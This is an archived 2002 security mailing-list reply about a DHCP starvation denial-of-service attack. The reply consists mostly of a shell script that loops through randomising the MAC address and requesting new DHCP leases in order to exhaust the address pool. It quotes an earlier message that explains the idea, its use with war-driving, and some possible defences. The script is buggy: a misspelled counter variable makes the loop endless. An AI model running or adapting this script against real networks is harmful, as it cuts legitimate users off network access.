Re: DoS against DHCP

From: Russell Handorf (rhandorf@mail.russells-world.com)
Date: 01/31/02


Date: Wed, 30 Jan 2002 18:34:35 -0500
To: RSnake <rsnake@shocking.com>, vuln-dev@securityfocus.com
From: Russell Handorf <rhandorf@mail.russells-world.com>


#!/bin/sh
counter=0
if [ $# -eq 0 ]
then
         echo "You're missing the arguement of how many times for me to
repeat."
         exit 1
fi
while [ $counter -le $1 ]
do
         ifconfig eth0 down
         ./changemac -r
         pump
         ifconfig eth0
         coutner=`expr $counter + 1`
done
echo "done"

Contingent on you having changemac or some other way to randomize a new mac
addy.

russ

At 02:20 PM 1/30/2002 -0800, you wrote:

> I came up with this about a year back at DefCon, and told some
> friends
>in hopes that either they or I would do something with it, but none of us had
>time so here goes, and please feel free to write this yourself. DoS against
>DHCP:
>
> A DHCP server has only a certain amount of addresses availible. If
>you (a single malicious machine connected to the network) actively take up all
>availible IP address, and compete against the machines that are currently
>connected you should be able to completely take all availible IP addresses and
>block access to the DHCP server. You could do this by opening many interfaces
>on a linux box and asking for many DHCP addresses and lying that you connected
>before any competing machines (or DoS the competing machine directly until the
>DHCP server releases the IP address to you).
>
> This combined with war-driving could take down any DHCP IP address
>block within wireless range. Kinda nasty, but only effective as long as you
>stay connected to the network, so a compromised machine on the network
>might be
>necessary for extended DoS. Probably the way around this would be a) some
>sort
>of authentication to log into the DHCP server and or b) using leap or
>something
>similar. MAC addresses are spoofable, so it probably wouldn't be a good idea
>to limit the number of times a particular MAC address connects to the network,
>as that would just be a sloppy obfuscation. DHCP has always seemed like a bad
>idea to me. Sorry if this seems obvious.

==================================
Russell Handorf
oooo, shiney ::Wanders after it::

www.russells-world.com
www.philly2600.net

"Computer games don't affect kids, I mean if Pacman affected us as kids,
we'd all be running around in darkened rooms, munching pills and listening
to repetitive music." ~unknown
==================================